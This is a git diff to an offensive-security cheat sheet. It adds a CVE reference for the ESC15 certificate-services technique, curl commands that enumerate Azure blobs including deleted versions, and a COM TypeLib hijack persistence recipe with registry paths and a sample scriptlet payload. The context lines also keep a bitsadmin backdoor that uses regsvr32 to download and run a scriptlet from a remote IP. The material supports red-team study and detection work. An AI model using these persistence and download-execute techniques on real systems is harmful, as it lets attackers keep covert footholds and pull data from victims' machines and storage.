COM Persistence + EKUwu CVE + Deleted Blobs from Azure Storage
parent
bb0b447d12
commit
ea7e265dac
|
@ -423,7 +423,10 @@ Members : {}
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
## ESC15 - EKUwu Application Policies
|
## ESC15 - EKUwu Application Policies - CVE-2024-49019
|
||||||
|
|
||||||
|
This technique now has a CVE number and was patched on November 12, See [Active Directory Certificate Services Elevation of Privilege Vulnerability - CVE-2024-49019](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-49019) for more information.
|
||||||
|
|
||||||
|
|
||||||
**Requirements**
|
**Requirements**
|
||||||
|
|
||||||
|
|
|
@ -17,6 +17,40 @@ Found Storage Account - redacted.blob.core.windows.net
|
||||||
|
|
||||||
## List and download blobs
|
## List and download blobs
|
||||||
|
|
||||||
|
Visiting `https://<storage-name>.blob.core.windows.net/<storage-container>?restype=container&comp=list` provides a JSON file containing a complete list of the Azure Blobs.
|
||||||
|
|
||||||
|
```xml
|
||||||
|
<EnumerationResults ContainerName="https://<storage-name>.blob.core.windows.net/<storage-container>">
|
||||||
|
<Blobs>
|
||||||
|
<Blob>
|
||||||
|
<Name>index.html</Name>
|
||||||
|
<Url>https://<storage-name>.blob.core.windows.net/<storage-container>/index.html</Url>
|
||||||
|
<Properties>
|
||||||
|
<Last-Modified>Fri, 20 Oct 2023 20:08:20 GMT</Last-Modified>
|
||||||
|
<Etag>0x8DBD1A84E6455C0</Etag>
|
||||||
|
<Content-Length>782359</Content-Length>
|
||||||
|
<Content-Type>text/html</Content-Type>
|
||||||
|
<Content-Encoding/>
|
||||||
|
<Content-Language/>
|
||||||
|
<Content-MD5>JSe+sM+pXGAEFInxDgv4CA==</Content-MD5>
|
||||||
|
<Cache-Control/>
|
||||||
|
<BlobType>BlockBlob</BlobType>
|
||||||
|
<LeaseStatus>unlocked</LeaseStatus>
|
||||||
|
</Properties>
|
||||||
|
</Blob>
|
||||||
|
```
|
||||||
|
|
||||||
|
Browse deleted files.
|
||||||
|
|
||||||
|
```ps1
|
||||||
|
$ curl -s -H "x-ms-version: 2019-12-12" 'https://<storage-name>.blob.core.windows.net/<storage-container>?restype=container&comp=list&include=versions' | xmllint --format - | grep Name
|
||||||
|
|
||||||
|
<EnumerationResults ServiceEndpoint="https://<storage-name>.blob.core.windows.net/" ContainerName="<storage-container>">
|
||||||
|
<Name>index.html</Name>
|
||||||
|
<Name>scripts-transfer.zip</Name>
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
PS Az> Get-AzResource
|
PS Az> Get-AzResource
|
||||||
PS Az> Get-AzStorageAccount -name <NAME> -ResourceGroupName <NAME>
|
PS Az> Get-AzStorageAccount -name <NAME> -ResourceGroupName <NAME>
|
||||||
|
|
|
@ -242,6 +242,44 @@ bitsadmin /SetNotifyCmdLine backdoor regsvr32.exe "/s /n /u /i:http://10.10.10.1
|
||||||
bitsadmin /resume backdoor
|
bitsadmin /resume backdoor
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
|
### COM TypeLib
|
||||||
|
|
||||||
|
* [CICADA8-Research/TypeLibWalker](https://github.com/CICADA8-Research/TypeLibWalker) - TypeLib persistence technique
|
||||||
|
|
||||||
|
Use [sysinternals/procmon](https://learn.microsoft.com/fr-fr/sysinternals/downloads/procmon) to find `RegOpenKey` with the status `NAME NOT FOUND`. The process `explorer.exe` is a good target, as it will spawn your payload every time it is run.
|
||||||
|
|
||||||
|
|
||||||
|
```ps1
|
||||||
|
Path: HKCU\Software\Classes\TypeLib\{CLSID}\1.1\0\win32
|
||||||
|
Path: HKCU\Software\Classes\TypeLib\{CLSID}\1.1\0\win64
|
||||||
|
Name: anything
|
||||||
|
Type: REG_SZ
|
||||||
|
Value: script:C:\1.sct
|
||||||
|
```
|
||||||
|
|
||||||
|
Example of content for `1.sct`.
|
||||||
|
|
||||||
|
```xml
|
||||||
|
<?xml version="1.0"?>
|
||||||
|
<scriptlet>
|
||||||
|
<registration
|
||||||
|
description="explorer"
|
||||||
|
progid="explorer"
|
||||||
|
version="1.0"
|
||||||
|
classid="{66666666-6666-6666-6666-666666666666}"
|
||||||
|
remotable="true">
|
||||||
|
</registration>
|
||||||
|
<script language="JScript">
|
||||||
|
<![CDATA[
|
||||||
|
var WShell = new ActiveXObject("WScript.Shell");
|
||||||
|
WShell.Run("calc.exe");
|
||||||
|
]]>
|
||||||
|
</script>
|
||||||
|
</scriptlet>
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
## Serviceland
|
## Serviceland
|
||||||
|
|
||||||
### IIS
|
### IIS
|
||||||
|
@ -623,3 +661,4 @@ Set-DomainObject -Identity <target_machine> -Set @{"ms-mcs-admpwdexpirationtime"
|
||||||
* [Persistence via WMI Event Subscription - Elastic Security Solution](https://www.elastic.co/guide/en/security/current/persistence-via-wmi-event-subscription.html)
|
* [Persistence via WMI Event Subscription - Elastic Security Solution](https://www.elastic.co/guide/en/security/current/persistence-via-wmi-event-subscription.html)
|
||||||
* [PrivEsc: Abusing the Service Control Manager for Stealthy & Persistent LPE - 0xv1n - 2023-02-27](https://0xv1n.github.io/posts/scmanager/)
|
* [PrivEsc: Abusing the Service Control Manager for Stealthy & Persistent LPE - 0xv1n - 2023-02-27](https://0xv1n.github.io/posts/scmanager/)
|
||||||
* [Sc sdset - Microsoft - 08/31/2016](https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc742037(v=ws.11))
|
* [Sc sdset - Microsoft - 08/31/2016](https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc742037(v=ws.11))
|
||||||
|
* [Hijack the TypeLib. New COM persistence technique - CICADA8 - October 22, 2024](https://cicada-8.medium.com/hijack-the-typelib-new-com-persistence-technique-32ae1d284661)
|
Loading…
Reference in New Issue